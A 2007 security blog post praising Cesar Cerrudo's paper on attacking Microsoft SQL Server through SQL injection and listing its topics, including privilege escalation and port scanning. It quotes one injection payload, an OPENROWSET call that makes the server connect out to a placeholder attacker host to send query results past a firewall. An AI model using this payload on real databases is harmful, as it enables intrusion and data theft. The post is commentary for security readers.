Bending MS SQL Server and Greasing It Up
I just read a great article published by Application Security Inc. which gave me some good ideas for my future SQL Injection attacks. It starts like this :
select * from OPENROWSET(‘SQLoledb’, ‘uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;’, ‘select * from table’)
Well, having the SQL server call home to your machine is cool enough (bye bye firewall) , but the paper’s author, Cesar Cerrudo went a step forward . These are the main topics covered by his paper :
- Detection of sql injection vulnerabilities
- Retrieving results from sql injection
- Elevating privileges
- Uploading files
- Getting into the internal network
- Port scanning
- Recommendations
I highly recommend Manipulating Microsoft SQL Server Using SQL Injection
Thank you for reading this post. You can now Leave A Comment (0) or Leave A Trackback.
Print This Post
Post Info
This entry was posted on Sunday, March 4th, 2007 . Tagged with:You can follow any responses to this entry through the Comments Feed. You can Leave A Comment, or A Trackback.
Previous Post: Watch YouTube and Identify Criminals »
Next Post: Web App Security Hall Of Fame – Meet the Gurus part 3 »
Read More
Related Reading:
Latest Posts:
- Animated Presentation on Sony PSN Hack
- ArcSight Tip #1 – arcsight managersetup notification test
- I’m a CISSP
- Operation:Payback or Social Vendetta is Here
- I got owned by Malware Destructor 2011 Virus
- New Downtime Cost Calculator by Storagepipe.com. What if ?
- Securing Your Network from Web Threats
- My Twitter Notes on 2010-07-25
- New NetWitness Visualize : Welcome To The Future!
- My Twitter Notes on 2010-07-18
